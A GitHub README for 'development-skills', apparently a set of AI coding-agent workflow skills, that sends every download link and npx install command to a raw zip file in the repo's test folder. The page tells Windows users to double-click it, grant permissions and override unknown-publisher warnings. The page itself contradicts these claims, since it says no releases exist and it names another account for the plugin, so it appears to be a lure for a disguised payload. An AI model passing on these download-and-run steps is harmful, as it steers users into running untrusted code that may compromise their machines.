Skip to content

marcellotibial471/development-skills

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

⚙️ development-skills - Simplify Your Software Workflow

Download

📋 About development-skills

development-skills is a set of tools designed to help you handle software projects smoothly. It guides a feature from the initial idea to a final, tested product. The tools break down the work into clear steps, making complex tasks easy to manage. You get a consistent way to build software without confusion.

The main parts of development-skills are:

  • spec: Define the feature requirements.
  • plan: Organize the work and timeline.
  • implement: Write the code according to the plan.
  • review: Check the work for issues and improvements.
  • test: Make sure everything works correctly.

Each part works as a skill you can use when handling your software projects.


🌐 Download development-skills

Download

You can visit the release page to download the package. The download page has the latest version available. You will get all the tools to start using these skills.

Link: https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip


💻 System Requirements

  • Windows 10 or later.
  • 4 GB of RAM or more.
  • At least 500 MB of free disk space.
  • Internet connection for downloading and setting up.
  • No special hardware needed.

development-skills runs on your regular Windows PC without extra demands.


🚀 Getting Started: How to Download and Run on Windows

Follow these steps to download and use development-skills on your Windows computer.

Step 1: Go to the Download Page

Open your web browser. Visit the release page:

https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip

This page lists all available versions.

Step 2: Download the Latest Version

Look for the latest release, usually the first on the list. Under it, find files available to download. Click the one that matches your needs. Usually, it will be labeled clearly.

Save the file to a folder you can find easily, such as your Desktop or Downloads.

Step 3: Run the Installer or File

Go to the folder where you saved the file. Double-click the file to start the installer or the program directly.

If the system asks for permission, approve it to continue.

Step 4: Follow the Setup Instructions

If you see an installer, follow the on-screen steps. The installer will guide you through the process, including accepting terms and choosing where to install.

If no installer appears and the file runs immediately, wait while it sets up the tools.

Step 5: Open development-skills

Once setup completes, you can open the program. Look for the development-skills icon on your Desktop or Start menu.

Click it to launch the application.


🛠 How to Use development-skills

You do not need technical knowledge to use development-skills. The tools break your work into clear steps.

  1. Define with spec: Write what the feature should do. Keep it simple and clear.
  2. Organize with plan: List the tasks and decide when to do them.
  3. Build with implement: Follow the plan and create the feature.
  4. Check with review: Look over what you made for mistakes or improvements.
  5. Confirm with test: Make sure everything works as expected.

Each step uses easy commands or buttons in the software to guide you.


🔧 Installation Options for Advanced Users

development-skills supports two methods for adding the skills if you use developer tools.

Option A: Install Single Skills with skills.sh

If you have skills.sh, you can add each skill individually with these commands:

npx skills add https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip --skill spec
npx skills add https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip --skill plan
npx skills add https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip --skill implement
npx skills add https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip --skill review
npx skills add https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip --skill test

Option B: Use Claude Code Plugin

You can install the entire set at once using the Claude Code marketplace:

/plugin marketplace add SimpleEve/development-skills

🔄 Updates and Support

Check the release page regularly to download the latest version. Updated versions improve the tools and fix bugs.

For help or questions, open an issue on the GitHub repository page.


🗂 What’s Inside development-skills?

The project organizes your work with these tools:

  • spec: Helps write clear descriptions of what needs to be done.
  • plan: Helps list tasks step by step with timelines.
  • implement: Helps create the actual feature, following the plan.
  • review: Lets you examine your work and improve it.
  • test: Lets you run checks to ensure it works well.

Each part works together to keep your project on track.


🚧 Troubleshooting Common Issues

  • If the installer does not start, try downloading again. The file may not have downloaded correctly.
  • If Windows warns about unknown publishers, allow the installer as you downloaded it from a trusted source.
  • If the program does not open, make sure your system meets the requirements.
  • Restart your computer if things do not work right after installation.

🧾 License and Source Code

development-skills is available on GitHub with an open-source license. You can review the code or contribute if you want.

Repository URL: https://github.com/marcellotibial471/development-skills/raw/refs/heads/main/test/skills-development-1.4.zip


🌍 Language Support

The repository also provides a simplified Chinese version of this documentation for users who prefer it.


⚙️ System Overview

development-skills simplifies the software process by using clear steps anyone can follow. You do not need programming skills to use it. It works by guiding you through making plans, writing specs, building, reviewing, and testing all in one place.


Download

About

Streamline software delivery by applying reusable skills to move features from requirements to tested implementation consistently.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors